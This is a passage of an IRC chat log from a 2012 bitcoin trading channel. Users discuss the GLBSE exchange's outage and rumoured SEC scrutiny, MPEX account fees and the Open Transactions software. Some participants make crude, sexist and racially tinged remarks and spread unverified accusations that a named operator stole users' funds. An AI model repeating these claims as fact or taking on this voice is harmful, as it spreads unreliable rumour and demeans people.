shareholders. A successor system would have to be constructed (either centralized or maintained independently by the respective issuers), but no information is lost : since people can still sign with their keys, it is trivial for anyone who is in fact a shareholder to identify himself as shareholder. Just to be on Oct 04 19:09:37 the safe side, a dump of all users' final STATs, encrypted with their keys and clearsigned by the exchange will be released before closing, in whatever manner will be deemed at that time efficient, as for instance on a p2p file sharing system. Oct 04 19:09:39 that';d be it. Oct 04 19:10:39 I'm starting to think the main 'safe' thing about mpex is that you're in Romania :P Oct 04 19:10:54 no, the main safe thing about mpex is that i'm a hardass. Oct 04 19:10:55 And the big governments don't tend to get that far Oct 04 19:11:24 anyway, in case anyone missed it earlier : https://bitcointalk.org/index.php?topic=115441.0 Oct 04 19:11:28 mpex new acct fee is 30 btc now. Oct 04 19:12:01 maybe Ill create my own stock exchange site, :D Oct 04 19:12:14 PsychoticBoy just don't run it like glbse. Oct 04 19:12:15 [MPEX] [S.MPOE] 676 @ 0.00036748 = 0.2484 BTC [+] Oct 04 19:12:31 Maybe what we need is a decentralized exchange? Oct 04 19:12:46 So that if one important person or server gets v&, the exchange goes on Oct 04 19:13:20 maybe so. Oct 04 19:13:32 da2ce7 and others were working on one Luceo Oct 04 19:14:07 I'm glad I pulled out of GLBSE when they started trying to go legal Oct 04 19:14:27 Luceo: congratz on being the umteenth person to suggest and not yet impliment a decentralized bitcoin securities exchanges. next action, find Open Transactions Oct 04 19:14:36 I pulled the last 100 BTC I had there during the last week Oct 04 19:14:42 OneEyed smart. Oct 04 19:14:46 from the forums : "GLBSE has better assets and is free. I am now even less likely to sign up to you." Oct 04 19:14:48 dun dun dun. Oct 04 19:14:48 mircea_popescu: it started to smell very bad Oct 04 19:14:50 smickles: Looking for it Oct 04 19:15:04 #opentransactions Oct 04 19:15:08 Luceo: OT seems like it could work, it just needs a bit more dev Oct 04 19:15:08 mircea_popescu: Konichua is very young, go easy on him :P Oct 04 19:15:15 I'm glad I pulled out of GLBSE when they started trying to go legal <--- that statement looks bad Oct 04 19:15:27 Luceo i ain't sayin anything :p Oct 04 19:15:40 ErebusBat emphasis was on "trying". Oct 04 19:15:46 ErebusBat: Every Bitcoin business which has tried to go 'legit' has become worse Oct 04 19:16:16 ^^^ I don't nessecarily disagree, but taken out of context that is a very bad thing to have in a news clipping (or courtroom) Oct 04 19:16:20 Until the system recognizes and legislates around Bitcoin, any attempt to take Bitcoin businesses through regulation & registration is futile Oct 04 19:16:40 moreover, the system will have to recode itself to fit with bitcoin Oct 04 19:16:42 Open Transactions does work, I have never used any financial system that was as good at actually keeping balances correct before Oct 04 19:16:44 not the other way around Oct 04 19:16:46 Well sure, taken out of context it is Oct 04 19:16:48 "bitcoins are just for criminals… as soon as GLBSE tried to become legal alot of users jumped ship and here are some quotes….." Oct 04 19:16:59 having all balances have to be signed for seems to make it extremely robuts Oct 04 19:17:05 ErebusBat you have a point there. Oct 04 19:17:08 robust Oct 04 19:17:10 knotwork: what is OT actulally good for *today*? Oct 04 19:17:23 use knotwork's server and find out Oct 04 19:17:25 ErebusBat i think there's some game servers using it already Oct 04 19:17:26 ErebusBat: I understand but let's just put that into context Oct 04 19:17:33 It's the legal system which makes it that way Oct 04 19:17:40 It works, you can transfer assets from user to user, you can put them on markets, you can withdraw blinded cash tokens Oct 04 19:17:51 you can do cheques and "cashiers cheques" Oct 04 19:18:14 If the legal system wasn't in the 1900s, and unable to work with Bitcoin, and with small financial services providers, then we wouldn't have these issues Oct 04 19:18:21 It could do with easier way to use Tor though, like actual proxy-port support Oct 04 19:18:47 knotwork: so you're saying just the ui and tor interface need work? Oct 04 19:18:54 and of course it could do with prettier clients if it actually makes any sense to let grandma have a seat on a stock exchange Oct 04 19:19:21 smickles: yeah, ther eare some recent videos demonstarating Oct 04 19:19:24 grandma probably ought to just use videochat with her nice friendly broker though at $75/hour or whatever and let him/her deal with all the complicated stuff Oct 04 19:19:45 the term "going legal" implies complying with regulations Oct 04 19:20:00 based on the nature of bitcoin, regulations will make people jump ship Oct 04 19:20:02 smickles well it needs scaling up too Oct 04 19:20:18 glbse would have to get a lot of info from its users to comply with us regs, and serve us users Oct 04 19:20:25 well to be fair, it wasn't the act of intending to comply with regulations that brought the regulators down on them Oct 04 19:20:42 right now we had to put a limit to the number of offers a nym can have open because nyms issuing 72 offers 3 times a day without clearing their inboxes were blowing out the inbox download timeouts Oct 04 19:21:01 knotwork: oh wow Oct 04 19:21:02 so we put a limit of only 36 open offers per nym for now Oct 04 19:21:19 knotwork: open offers, so that's like buy/sells? Oct 04 19:21:26 thing is there are so damn many markets the market-making scripts wanted to post shitloads of offers Oct 04 19:21:34 yes, buy/sells Oct 04 19:22:06 https://bitcointalk.org/index.php?topic=115441.0 Oct 04 19:22:06 lol Oct 04 19:22:33 kakobrekla: the first reply is golden Oct 04 19:22:40 I have scripts that take the computed value for an asset in terms of another and place offers to buy by the one at a time at 97% or by the ten at a time at 98% or by the 100-lot at 99% and to similarly sell at 103%, 102%, 101% stuff like that Oct 04 19:22:40 :D Oct 04 19:22:52 so thats six offers right there just to do one way round of one pair Oct 04 19:23:39 because of those scale factors it treats both ways round of a pair as distinct markets Oct 04 19:24:08 interesting, i need to settle into my new place first tho :| Oct 04 19:24:20 so like at 100 scale, offering to sell 100 of A for x many B per 100 is separate market from offering to sell 100-lots of B for y many A per 100 Oct 04 19:24:40 so tons of need for arbitrageurs Oct 04 19:25:01 even if they just buy 100-lots and sell in smaller lots or whatever Oct 04 19:25:24 or match up folk selling A for price in B with people selling B for price measured in A Oct 04 19:25:39 knotwork: well, today may be a good day to attract more players Oct 04 19:25:44 see Luceo ? you ask me to go easy on them cause they're young, they sprout dumbass shit cause... heck, why not. they;re young and everyone should go easy on them Oct 04 19:25:47 this is broken. Oct 04 19:26:26 mircea_popescu: Hmm, you make a fair point Oct 04 19:26:47 im not gonna be the first taking 15yo's to be thrown off rocks, but i can't deny sparta had a point somewhere in there. Oct 04 19:28:03 I am hoping OT will appeal to large players due to its lack of percentage-based trading fees Oct 04 19:28:15 ;;seen nefario Oct 04 19:28:16 nefario was last seen in #bitcoin-assets 1 week, 2 days, 20 hours, 28 minutes, and 20 seconds ago: Those assets are not listed or traded anymore Oct 04 19:28:34 doing everything in integers should also hopefully help encourage larger size trades Oct 04 19:32:18 LOL mpex new acct fee is 30 btc now. Oct 04 19:32:33 Bugpowder hey, seems only fair. Oct 04 19:32:55 people that joined in time get an advantage over the ones that shittalked mpex back in the day cause "glbse is so much better" Oct 04 19:33:04 it's how busienss works : back the wrong horse, bleed out of each limb. Oct 04 19:33:47 OpenTransactions says its centralized Oct 04 19:33:48 o.O Oct 04 19:33:50 is this where I brag about paying less fees to mpex than glbse Oct 04 19:33:58 Luceo: but federated Oct 04 19:34:03 Damn I didnt even turn on the usage tokens system yet in OT Oct 04 19:34:32 my mpex account was free, casue they used to be free Oct 04 19:34:51 oh thats right piegons rub it in why dont you Oct 04 19:34:54 pigeons: you fucking early adopter Oct 04 19:35:01 damn and I was testing out coinbr.com Oct 04 19:35:07 knotwork: while it was free i tried to get you to join Oct 04 19:35:13 30 btc* fee now? Oct 04 19:35:13 So I can't really use OT for anything today? Oct 04 19:35:31 ErebusBat: you can use OT for whatever you want today Oct 04 19:35:34 asa1024: dont forget that your eyes will bleed too… how can you put a price on that. Oct 04 19:35:38 ErebusBat sure you can, you just have to get it installed on your system Oct 04 19:35:38 ErebusBat: you could setup proxy assets to glbse assets and make a killing Oct 04 19:35:42 i bet Oct 04 19:35:46 lol Oct 04 19:36:04 ErebusBat you can use the scripting language or the java GUI client both work Oct 04 19:36:07 and don't forget the mighty https://assets-otc.com/ Oct 04 19:36:23 pigeons: rephrase: is anything else actually using OT today? Or is it still pretty much POC? Oct 04 19:36:52 lol pigeons was mining back when cpu were the rage, too Oct 04 19:36:54 BURN HIM Oct 04 19:37:06 ErebusBat: knotwork has a server with btc, i0c,ixc, ltc, CDN, etc, a handful of other servers, i'm not sure which of them want to be announced yet Oct 04 19:37:27 [MPEX] [S.MPOE] 66100 @ 0.00036628 = 24.2111 BTC [-] Oct 04 19:37:44 any guides on OT? Last I looked there really were not Oct 04 19:37:50 there are videos now Oct 04 19:37:54 I have been making tables for my own curiosity at http://galaxies.mygamesonline.org/digitalisassets.html Oct 04 19:38:13 that's you? Oct 04 19:38:30 http://open-transactions-tv.github.com/ Oct 04 19:38:33 yea, that was him Oct 04 19:38:44 yeah Digitalis Data Services is my sole proprietorship, see WHOIS knotwork.com and WHOIS knotwork.net Oct 04 19:38:44 ty pigeons Oct 04 19:38:57 https://github.com/FellowTraveler/Open-Transactions/wiki Oct 04 19:39:49 once there is some easy way to use it through Tor there are a few groups who want to have OT servers as Tor hidden services Oct 04 19:39:51 pay me back first, but srsly, don't Oct 04 19:40:02 currently they make do with Truledger for that I think Oct 04 19:40:08 a couple truledger servers on tor are getting popular Oct 04 19:40:27 go read the myth of sysiphus by Camus, usagi Oct 04 19:40:34 well, compared to a few months ago Oct 04 19:40:38 Truledger doesnt have markets though nor even escrow-type smart contracts to force trades to actually happen both ways Oct 04 19:40:39 that should change your mind Oct 04 19:41:09 .wik "the myth of sysiphus" Oct 04 19:41:11 "The Myth of Sisyphus is a philosophical essay by Albert Camus." - http://en.wikipedia.org/wiki/The_Myth_of_Sisyphus Oct 04 19:42:14 of all things, when I learned that guy died in a train crash, i laughed Oct 04 19:42:20 So is Truledger like OT? Oct 04 19:42:56 Truledger only does accounts. it does similar type of accounting where everything is signed though Oct 04 19:43:22 but no markets, no way to make sure guy sends you in return what he promised when you send him something Oct 04 19:43:58 I think people have been using it mostly just for their local trust group for doing accounting around their in and out to fiat stuff among people they know Oct 04 19:44:14 mostly gold i've seen with truledger Oct 04 19:44:37 Watching the OT vids: makes me thiink of bitcoin test net… at first you are like I HAVE 10,000 BTC!!!! then realize you cant actully do anything with them :( Oct 04 19:44:44 I dont touch fiat at all with my server, I only deal with game money like bitcoins and litecoins and ixcoins and all that play money stuff Oct 04 19:47:43 smickles: https://bitcointalk.org/index.php?topic=102316.0 Oct 04 19:48:11 the myth of sisyphus is actually an old favorite Oct 04 19:48:20 there is much to learn there Oct 04 19:48:22 jcpham it's so for all married men. Oct 04 19:48:53 i was just saying how i wished reeses were here to troll this bitch up Oct 04 19:48:58 lol Oct 04 19:48:59 and look what happened Oct 04 19:49:03 you can get knowtwork's OT contracts here http://sourceforge.net/projects/galacticmilieu/files/ Oct 04 19:49:31 jcpham rubs my bottle and I come out Oct 04 19:49:44 i rub it hard Oct 04 19:50:16 knotwork: well, i may not be too far off from helping out Oct 04 19:55:39 I wonder when the first murder over bit coin is gonna happen? Oct 04 19:56:07 the media will love that one "FIRST MURDER OVER A VIRTUAL CURRENCY!!!" Oct 04 19:56:27 asa1024 this happened already Oct 04 19:56:32 was i think wow gold ? in korea Oct 04 19:56:35 coupla years back Oct 04 19:56:42 oh yeah? Oct 04 19:56:45 lol Oct 04 19:57:08 i don't think bitcoin is a virtual currency anyway Oct 04 19:57:54 well, it's virtual alright. Oct 04 19:58:05 digitally signed record of ownership of digital record Oct 04 19:58:14 i don't see anything virtual about that Oct 04 19:58:29 can i take a bite out of it ? Oct 04 19:58:46 if you can't kill your girlfriend with it, it's virtual. also known as rule of thumb. Oct 04 19:59:01 data on harddrives has mass mircea_popescu Oct 04 19:59:18 yes but the relationship between real data and the virtual coins is... virtual. Oct 04 19:59:27 whereas a duck which is real has weight, it's own. Oct 04 19:59:32 not the weight of some picture of it. Oct 04 20:00:12 (the duck also weighs the same as a witch, which is virtual) Oct 04 20:01:00 [MPEX] [S.BVPS] 550 @ 0.00347504 = 1.9113 BTC [+] Oct 04 20:01:17 sup Oct 04 20:01:36 mircea_popescu: but it's the known claim to control of the virtual thing that has the value, so it's the data, not the thing itself Oct 04 20:01:39 less virtual than usd Oct 04 20:02:20 if safekeys were the token claims that'd make the content of the safe no less virtual by this working. Oct 04 20:03:00 like thos boulders on that island at that time Oct 04 20:03:15 .n Oct 04 20:03:40 news from nefario? Oct 04 20:04:07 Anduck not so far. Oct 04 20:04:15 "whith the thing in the place" Oct 04 20:04:15 smickles easter island was it ? Oct 04 20:05:35 heh, not that I know of Oct 04 20:05:45 DeaDTerra texted him Oct 04 20:05:57 mircea_popescu: i don't think it was easter island Oct 04 20:06:24 mmm, maybe irw Oct 04 20:07:17 mircea_popescu: i would look it up, but curiously, all my networking died with the exception of irc Oct 04 20:07:19 DeaDTerra, can you buy all my GSDPT back from me at what I bought it at? Oct 04 20:07:28 ;;google boulders as money Oct 04 20:07:28 Rai stones - Wikipedia, the free encyclopedia: ; Bolder Boulder - Boulder Daily Camera: ; Make Fake Artificial Landscape Rocks or Boulders - Save Money ...: Oct 04 20:07:36 rai stones, i bet Oct 04 20:07:37 What's this about GLBSE going down? What will happen to all my BTC and PPT shares? Oct 04 20:07:58 and its gone Oct 04 20:08:22 all this malignity Oct 04 20:08:31 towards a reputable hyip platform Oct 04 20:09:00 That would be fine with me. Oct 04 20:09:55 I dont have an Mpex account however, mircea_popescu said I wasn’t worthy. Oct 04 20:10:00 lol Oct 04 20:10:09 Doffx so have an in-kind transfer to some broker or w/e Oct 04 20:10:31 Doffx I will sell the for you for 10% cut Oct 04 20:10:32 once glbbq comes basck online, you get your coupons, you redeem them etc Oct 04 20:10:33 Well first I need to be able to access my Glbse account to give him the totals. Oct 04 20:11:19 nobody is going to honor glbbq coupons. Oct 04 20:11:30 FledNanders why do you demonize ? Oct 04 20:11:36 are you going rto say next that milk is a scammer ? Oct 04 20:11:42 The Goat precident. Oct 04 20:12:11 milk isn't a scammer. milk does the body good. Oct 04 20:12:24 Well I guess its a good thing I mostly own that asset Oct 04 20:12:58 Ok cool, If Sat Glbse is back ill ping you. Oct 04 20:13:54 Doffx: if you have shares of gsdpt (or whatev) you could give DeaDTerra a signed doc that says you'll give X shares to him as soon as is possible Oct 04 20:14:04 that way, you could sell today Oct 04 20:14:29 for that matter, you could probably do that with anyone, not just DT Oct 04 20:15:01 btw Oct 04 20:15:08 glbse down got something to do with pirate? Oct 04 20:15:17 noone really knows Oct 04 20:15:18 I dont know how many I have exactly is the problem haha Oct 04 20:15:46 Anduck hardly Oct 04 20:15:51 Doffx: you could just do it wiht an amount you are comfortable with Oct 04 20:16:10 I want to sell them all, and move on. Oct 04 20:16:16 well Oct 04 20:16:24 it was a major source of pirates bonds Oct 04 20:16:27 so ummmhh Oct 04 20:16:28 if it ends up being more than you actually had, you just take responsibility for the difference Oct 04 20:16:37 if SEC is investigating, glbse might been shut down cuz of it Oct 04 20:16:55 http://www.youtube.com/watch?v=k9IfHDi-2EA Oct 04 20:17:29 GLBSE should be migrated to a .bit site. Should have been migrated a long time ago. Oct 04 20:17:44 FledNanders .bit is accessible in vanilla browser ? Oct 04 20:17:50 I may do that tonight then smickles, my gpg keys are on another pc. Oct 04 20:17:59 I really need to export them to this pc. Oct 04 20:18:03 um pirate is one of the reasons there the legal folks are interested in glbse Oct 04 20:18:09 is the SEC investigating or not? Oct 04 20:18:12 yes Oct 04 20:18:14 mircea_popescu: yes Oct 04 20:18:20 unless you're an idiot Oct 04 20:18:37 meh Oct 04 20:18:38 mircea_popescu: one line in your resolv.conf Oct 04 20:18:44 I think Im just going to officially announce the end of DMC Oct 04 20:18:49 FledNanders you seriously are making that distinction with glbbq "investors" ? Oct 04 20:18:50 DeaDTerra: how about the fucking SEC they said they are Oct 04 20:18:51 DeaDTerra: Nefario confirmed it on the forum somewhere. Oct 04 20:19:35 i proved it to myself, why should i prove it to you Oct 04 20:19:42 SEC contacted Nefario. I'm confident that is a fact. Oct 04 20:19:45 DeaDTerra: you know what I want to know? I got trolls, you didnt Oct 04 20:19:46 i don't want it to be true, but it is Oct 04 20:19:51 DeaDTerra: but we both got fucked the same way Oct 04 20:20:09 mircea_popescu: this in your resolve.conf and you're done: search namecoin-suffix.dot-bit.org Oct 04 20:20:35 didnt read the DMC thread? Oct 04 20:20:53 all the forum trolls jumped on the nefario train and trolled the fact DMC lost money because of nefario's bullshit Oct 04 20:21:12 pigeons you realise most people on glbbq can't do gpg --clearsign, right ? the fuck they know how to find resolve.conf Oct 04 20:21:21 sorry *resolv.conf Oct 04 20:21:38 find / -name "resolv.conf" ;) Oct 04 20:21:47 on windoze ? Oct 04 20:21:55 what's that? Oct 04 20:21:57 on windows its hosts.txt Oct 04 20:22:03 right Oct 04 20:22:11 except i dunno, does the syntax even work in hosts.txt ? Oct 04 20:22:17 AND uit's a *hidden file* Oct 04 20:22:18 for windows: http://dot-bit.org/files/suffixes/namecoin.reg Oct 04 20:22:26 mircea_popescu: if you're manually setting shit? yes Oct 04 20:22:32 its identical to hosts on unix Oct 04 20:22:40 Diablo-D3 i had no ideea Oct 04 20:22:41 if you want to change DNS, you have to use the gui Oct 04 20:22:44 resolv.conf is not hosts Oct 04 20:22:50 but on a serious note pigeons, this is very useful info. Oct 04 20:22:51 no you don't Oct 04 20:22:51 pigeons: you missed the point of my comment Oct 04 20:22:55 Im aware of what resolv.conf is Oct 04 20:23:00 Ive written enough of them manually Oct 04 20:23:22 so far in spite of what the scammer group claims there's not been any actual pressure from the agencies on this, but should it come to it, making the site .bit is trivial. Oct 04 20:23:28 is the fucking forums down again Oct 04 20:23:30 oh wait, its just slow Oct 04 20:23:53 mircea_popescu - you plan to wait to be contacted to move to .bit? Oct 04 20:24:03 proactive is better than reactive. Oct 04 20:24:33 FledNanders why am i paying all these lawyers for then ? Oct 04 20:24:55 You aren't smart? Oct 04 20:25:01 riiight. Oct 04 20:25:12 guerilla means you fight and fall back Oct 04 20:25:12 mircea_popescu: is one of the best dressed men i know of Oct 04 20:25:16 it doesn't mean you just keep running Oct 04 20:25:16 ofc he's smart Oct 04 20:26:01 make sure to tell dreadpirateroberts to just go ahead and put silk road on a .com and hire your legal team. Oct 04 20:26:08 i'm sure that's the smart thing to do, right? Oct 04 20:26:11 mircea_popescu Oct 04 20:26:16 when you get a chance, send me that div money Oct 04 20:26:18 im setting it aside Oct 04 20:26:23 [MPEX] [S.MPOE] 21100 @ 0.00036412 = 7.6829 BTC [-] Oct 04 20:26:29 i did a withdrw, i tin i did t properly Oct 04 20:26:33 this FUCKKING KEYBOARD Oct 04 20:26:35 does anyone have any word about GLBSE? Oct 04 20:26:42 makes me look like a retard always dropping keystrokes Oct 04 20:26:44 turd is the word Oct 04 20:26:47 hctib yea, its back up. Oct 04 20:26:48 no new news yet hctib Oct 04 20:27:11 really mircea_popescu , I just checked Oct 04 20:27:14 theres new info on it Oct 04 20:27:14 hehe Oct 04 20:27:21 dun dun dun Oct 04 20:27:45 i want a few thousand mg's of caffeine for lunch Oct 04 20:28:34 so anyone knows what happened to glbse? Oct 04 20:28:40 lol Oct 04 20:28:52 something happend to glbse ?? Oct 04 20:29:06 vampireb - Nefario is updating to GLBSE 3.0 and adding a claim codes section to relclaim Goat assets. Oct 04 20:29:21 mircea_popescu: I see not much information on the site. Oct 04 20:29:30 maybe he went over his bandwidth? Oct 04 20:29:32 Call Nefario's phone. Oct 04 20:29:41 He says it's GLBSE 3.0 Oct 04 20:29:45 what a scammer Oct 04 20:30:32 GLBSE 3.0 = Options trading, leverage trading, partial share trades, code claiming, new charts, new server, etc... Oct 04 20:30:35 jcpham: I wouldnt want the position anyhow Oct 04 20:30:55 that makes you the perfect candidate Oct 04 20:31:26 Ive had enough drama for awhile Oct 04 20:31:28 FledNanders will it actually take < 5seconds per page load ? Oct 04 20:31:50 mircea_popescu - supposedly it will be "lightning fast" Oct 04 20:31:50 FledNanders: that still doesn't explain two days of down time with no notice. Oct 04 20:32:23 He didn't comment on that.... But I assume he wants to chase away the bad seeds. Oct 04 20:32:32 A little regulator scare might help that. Oct 04 20:32:51 Had to take the site down to migrate systems/servers and test things. Oct 04 20:33:05 Most likely it won't come back up on Saturday, but Monday after a weekend of bug fixing. Oct 04 20:33:18 monday, november 5th ? Oct 04 20:33:23 He will be contacting people soon regarding bug testers. Oct 04 20:33:48 At least that is what the guy who I presumed to be Nefario said when I called the number listed on the whois. Oct 04 20:33:58 it was me Oct 04 20:34:00 trolling you Oct 04 20:34:16 rg - quite possible. i had never spoken to Nefario before. Oct 04 20:34:48 And if you do a good job running scams there's always the ..... government. duh duh duh Oct 04 20:34:58 FledNanders he sorta sounds like a 50 yo lesbian on her last period. Oct 04 20:35:06 And if you do a good job avoiding scams there's always the ..... government. duh duh duh Oct 04 20:35:23 ;;rate arij 1 sold btc for ppusd. fast transaction Oct 04 20:35:23 Rating entry successful. Your rating of 1 for user arij has been recorded. Oct 04 20:35:32 mircea_popescu - i can't say i know what that sounds like Oct 04 20:35:40 omg somebody used bitcoin-assets for bitcoin business ? Oct 04 20:35:41 BAN HIM Oct 04 20:36:17 "he" sounded to me like a very professional young asian man. Oct 04 20:36:28 but that might just be assumption and racist Oct 04 20:36:42 he's irish Oct 04 20:36:45 so you're right on the money. Oct 04 20:36:54 inasmuch as he's young asian he's very professional. Oct 04 20:36:59 Fled: did the guy you spoke to sound like this http://www.youtube.com/watch?v=L4iPCpmv678 Oct 04 20:37:28 funny tho, FledNanders found the first azn mccarthy Oct 04 20:37:37 lol Oct 04 20:37:45 eh, so what's up with GLBSE Oct 04 20:37:53 nothing Oct 04 20:37:58 in fact... everything's down with glbse. Oct 04 20:38:03 fine over here Oct 04 20:38:45 apparently the sec had a change of heart. Oct 04 20:38:48 k3t3r - it is tough to say for sure. it is possible but he sounded more asian... Oct 04 20:39:23 maybe he was just exhausted and sick of his phone blowing up Oct 04 20:40:19 we talked to 3 minutes and he basically just rattled off glbse 3.0 upgrade features and said he is busy fixing bugs to try and get it up before Monday. Oct 04 20:40:56 he could have been in a panic that his number was published or just trying to throw people off Oct 04 20:41:05 weird he would give info out over the phone but not on the site Oct 04 20:41:28 anyway you know what i know. good luck to us all. i've got a couple grand i would like to see again. Oct 04 20:42:18 FledNanders are you serious ?! Oct 04 20:42:39 mircea_popescu - call the number Oct 04 20:42:58 says the other guy that called him.... Oct 04 20:43:09 DeaDTerra - did he mention GLBSE 3.0 to you? Oct 04 20:43:20 someon published his number? Oct 04 20:43:23 DeaDTerra - had you spoken to him before? Oct 04 20:43:38 smickles - do your research, it is available online Oct 04 20:44:40 I called about 25 minutes ago - when did you call? Oct 04 20:44:54 you texted? Oct 04 20:45:03 text =/= calling Oct 04 20:45:52 what a fascinating turn of events. Oct 04 20:46:22 fascinating to who? Oct 04 20:46:46 rather weak trolling, srsly. Oct 04 20:47:13 we'll see... Oct 04 20:47:15 call the # Oct 04 20:48:17 DeaDTerra - call and ask about GLBSE 3.0 Oct 04 20:48:30 see if i was being trolled Oct 04 20:50:01 i'll ignore all this tomorrow when I'm off work Oct 04 20:50:04 saturday too Oct 04 20:50:15 jcpham - good call. Oct 04 20:50:18 I dodged a bullet on this one Oct 04 20:50:24 :P Oct 04 20:51:25 flednanders, well I already had his number from when he called me months ago Oct 04 20:51:37 ohloggyoffy Oct 04 20:51:45 [MPEX] [S.MPOE] 34200 @ 0.00036412 = 12.4529 BTC [-] Oct 04 20:51:57 smickles different name from same ip was in yest trying to troll s.dice Oct 04 20:52:31 how does one troll s.dice? Oct 04 20:52:36 I know Nafario, I've met him, have him on my Facebook and have his phone number but I'm not calling him yet. As I imagine he is very busy and answering lots of calls. I have sent him a message on Facebook tho. Oct 04 20:53:07 so did anyone see anything stranger before the current page went up? Oct 04 20:53:15 or did it go out like a light? Oct 04 20:54:20 I still have a page up from there Oct 04 20:54:47 what is that people are thinking he did? Oct 04 20:54:56 usagi - you around? Oct 04 20:54:57 that is making you say that you trust him? Oct 04 20:55:06 usagi is incapacitated Oct 04 20:55:13 drunk? Oct 04 20:55:46 finding a high place Oct 04 20:55:46 [11:36] I have been speaking to nefario privately for weeks [11:36] WEEKS [11:37] Lol [11:37] ahahaha kakobrekla [11:37] I have access to the Bitcoin Global website where all the finalcials and minutes are published [11:37] I am not going to reveal anything supersecret but [11:37] Nefario is fucked [11:37] GLBSE is illegal Oct 04 20:56:11 Bugpowder then again you gotta consider the source. Oct 04 20:56:35 usagi isn't a good source? Oct 04 20:56:38 [12:03] I am sad. :( [12:03] Someone help me please. I'm crying. [12:03] I am sorry. [12:03] I am sorry. Oct 04 20:57:02 boonies4u hard to tell at this point. Oct 04 20:57:06 if that's legit, usagi sold him down the river Oct 04 20:57:28 only reason someone would say i'm sorry that many times Oct 04 21:00:23 even if GLBSE was forced to shut down there are multiple copies of the database and it wouldn't take long until it surfaced on I2p or Tor networks in full with all history, accounts and coin. Oct 04 21:00:50 what is up with usagi ? Oct 04 21:00:52 how does that work for monitizing the assets Oct 04 21:01:08 God this is the best thing that could have possibly happened to Kludge Oct 04 21:02:05 the multiple copies of the db has been proven? Oct 04 21:02:47 ;;ident Doffx Oct 04 21:02:48 Nick 'Doffx', with hostmask 'Doffx!~doff@173-160-245-174-Washington.hfc.comcastbusiness.net', is identified as user Doffx, with GPG key id DE23494FA64F5DA1, key fingerprint 9A9A9D9CA29C8F1FB40AC46DDE23494FA64F5DA1, and bitcoin address None Oct 04 21:03:12 I need to add a bitcoin address I spose Oct 04 21:03:41 tbcoin teek toffoo TomServo tonikt Transisto Oct 04 21:03:46 matthewh3 they'd have to be signed tho Oct 04 21:03:50 otherwise useless pretty much Oct 04 21:04:03 Bugpowder now that's a point. Oct 04 21:04:33 His girlfriend might one day become is wife now Oct 04 21:06:45 legally ? Oct 04 21:07:47 Hmm, how do you add a bitcoin address anyhow, I dont see it in the guide. Oct 04 21:09:08 sounds like i'm gonna have to buy a FPGA Oct 04 21:09:13 oh well Oct 04 21:09:25 x6500 ? Oct 04 21:11:13 nah, probably a single Oct 04 21:11:36 good luck! Oct 04 21:12:02 i have a year long loan https://btcjam.com/listings Oct 04 21:12:29 I was going to be activating it, and sending a good amount of funds to GLBSE Oct 04 21:12:36 so yeah, I dodged a bullet Oct 04 21:12:45 well, will be back monday. Oct 04 21:12:54 oh yeah? Oct 04 21:12:57 based on what? Oct 04 21:13:14 I can't really take YOUR word on that mircea_popescu Oct 04 21:13:38 lol. i was just saying, they claim this. Oct 04 21:13:52 ;;ident Doffx Oct 04 21:13:52 Nick 'Doffx', with hostmask 'Doffx!~doff@173-160-245-174-Washington.hfc.comcastbusiness.net', is identified as user Doffx, with GPG key id DE23494FA64F5DA1, key fingerprint 9A9A9D9CA29C8F1FB40AC46DDE23494FA64F5DA1, and bitcoin address None Oct 04 21:14:36 course, it was saturday ~4 hours ago and sunday ~2 hours ago, so maybe it's monay on the newyear's eve Oct 04 21:16:48 [MPEX] [S.MPOE] 400 @ 0.00036272 = 0.1451 BTC [-] Oct 04 21:18:02 mircea_popescu: what? Oct 04 21:19:06 boonies4u originally site was going to be back saturday. Oct 04 21:19:43 mircea_popescu: oh? well, i'll be waiting for update on saturday Oct 04 21:19:47 that is what I told my investors Oct 04 21:19:52 It says that there will be an update on Saturday. Oct 04 21:20:05 ^ Oct 04 21:20:37 Oct 04 18:38:35 I got a answer from Nefario. He can't comment on the downtime until Sunday. Oct 04 21:20:42 course... Oct 04 21:21:24 oh, well then... Oct 04 21:21:30 pfff Oct 04 21:21:43 ;;slap DeaDTerra Oct 04 21:22:45 Does no one ever get bored of people not being able to comment? Oct 04 21:23:04 Why cant people just be honest? :( Oct 04 21:23:44 bored no. annoyed maybe Oct 04 21:24:23 Luceo because when people ARE honest various idiot forumdwellers bitch whine and moan. Oct 04 21:26:08 okay so Oct 04 21:26:11 glbse is down Oct 04 21:26:17 nefario ran away with all the money Oct 04 21:26:18 fuck him Oct 04 21:28:00 mircea_popescu: Fuck the forum dwellers, I'd rather hear the truth Oct 04 21:28:22 Luceo it has been my policy from day one. Oct 04 21:28:30 heck, the pr girl even got a signed document to that effect. Oct 04 21:28:39 it was published there, to much huzzah. Oct 04 21:28:40 ;;ident Doffx Oct 04 21:28:40 Nick 'Doffx', with hostmask 'Doffx!~doff@173-160-245-174-Washington.hfc.comcastbusiness.net', is identified as user Doffx, with GPG key id DE23494FA64F5DA1, key fingerprint 9A9A9D9CA29C8F1FB40AC46DDE23494FA64F5DA1, and bitcoin address 1Q9FavHENPK7sATGm8ebthxG9EhQmaamw2 Oct 04 21:28:47 Yay, sorry for the spam. Oct 04 21:28:49 Diablo-D3 ironic, isn't it Oct 04 21:28:57 Its really me mircea_popescu! Oct 04 21:28:58 congrats Doffx - you got it! Oct 04 21:29:05 Thanks! Oct 04 21:29:08 lol wd. Oct 04 21:29:19 mircea_popescu: it is ironic. Oct 04 21:29:31 Not too keen on the 30 BTC fee for mpex :/ Oct 04 21:29:36 Will make the market less liquid Oct 04 21:29:42 mircea_popescu: the big irony is, I just announced officially Im shutting DMC down due to nefario's incompetence Oct 04 21:29:52 Would have thought you'd want to seize the fallout from GLBSE Oct 04 21:29:57 mircea_popescu: would the fee also include current beta testers of coinbr.com? Oct 04 21:30:25 asa1024: afaik coinbr users just use the coinbr account so they dont pay mpex fees Oct 04 21:30:26 popular man Oct 04 21:30:33 But its higher trading fees Oct 04 21:30:48 ty luceo for the answer!! Oct 04 21:30:49 Luceo you should have gone in when it was 20 Oct 04 21:30:49 :) Oct 04 21:30:54 or else, you know... wait for it to be 50 Oct 04 21:30:57 when btc is also 50 Oct 04 21:31:00 make a real loss. Oct 04 21:31:18 asa1024 coinbr has its own account, you don't pay me fees. Oct 04 21:31:31 ok ty sir! Oct 04 21:31:57 DERP Oct 04 21:32:08 hey mircea Oct 04 21:32:10 DERP Oct 04 21:32:34 sup Oct 04 21:33:14 I might try OT Oct 04 21:33:41 Luceo Oct 04 21:33:44 what ever happened to that raffle Oct 04 21:33:49 mircea_popescu: The reason I dont like the reg fee at mpex is that you keep all the idiots out so I cant just exploit them for easy btc :( Oct 04 21:33:56 rg: It's still going Oct 04 21:34:02 Luceo these 